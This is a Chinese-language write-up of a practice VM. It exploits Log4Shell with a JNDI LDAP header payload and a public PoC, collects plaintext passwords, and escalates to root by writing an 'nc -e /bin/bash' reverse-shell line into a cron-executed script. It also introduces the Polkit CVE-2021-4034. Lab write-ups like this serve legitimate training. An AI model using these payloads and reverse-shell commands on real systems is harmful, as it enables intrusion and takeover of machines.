前言提要

一个集合了Weblogic4j的漏洞且可以使用通杀漏洞：Linux Polkit提权的靶机，很不错哦

kali：192.168.132.139

靶机IP：192.168.132.176

信息收集

nmap -sS -A -sV -T4 -p- 192.168.132.176

开放了22、80和8080端口

进入80端口的web页面就是一个登陆口，看来我们需要爆破账号密码了（尝试SQL注入万能密码，失败）

8080端口是一个报错页面

目录扫描，扫描一些敏感文件之类的，使用gobuster来扫描

访问note.txt页面

这不就是提醒我们有Log4J漏洞了吗（这可是2021年爆出的一个大漏洞，安全圈过年的一个洞呀）

Logic4J

下载相关poc：https://github.com/kozmer/log4j-shell-poc.git

（要记得这个漏洞的利用java环境为jdk1.8.0，且在kali机器下该POC的目录下必须要有jdk1.8.0_20的文件夹：https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz）

然后在该目录下执行poc

python3 poc.py --userip 192.168.132.139
执行payload：${jndi:ldap://192.168.132.139:1389/a}
在kali监听：
 nc -lvnp 9001 
再打开一个终端：
curl http://192.168.132.176:8080/ -H 'X-Api-Version: ${jndi:ldap://192.168.132.139:1389/a}'

记住SpringBoot的log4j2漏洞payload验证是在"X-Api-Version"

居然是root权限！！！我们走运了？？那是不可能的，经过测试这是一个docker环境

我们上传一个提权信息收集脚本：linpeas.sh

在kali下载好脚本开启一个终端页面开启远程下载

python3 -m http.server 7788
wget http://192.168.132.139:7788/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

进一步证明了是docker

发现一些目录查看一下，找到了roger的密码： b3st4l13n

使用远程登陆

ssh roger@192.168.132.176

连接很鸡肋！！登进后输入命令啥也不显示，直到我准备重新尝试（Ctrl+C）

成功拿下一个flag

继续使用脚本信息收集，发现一个kang的密码：k4ng1sd4b3st

切换用户到kang，然后在主目录下发现一个奇怪的文件

文件一会存在一会小时，感觉像是kang创建了一个执行文件，然后执行成功后就删除

echo "echo test >/tmp/test" > test.sh
ls /tmp/test -l
echo "nc -e /bin/bash 192.168.2.148 4444" >test.sh

另一个终端监听反弹shell

nc -nvlp 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd root
cat root.txt

提权二：Linux Polkit（CVE-2021-4034）

Polkit（原名PolicyKit）是一个用于在类 Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式。还可以使用polkit以提升的权限执行命令，先使用命令pkexec，然后是要执行的命令（具有root权限）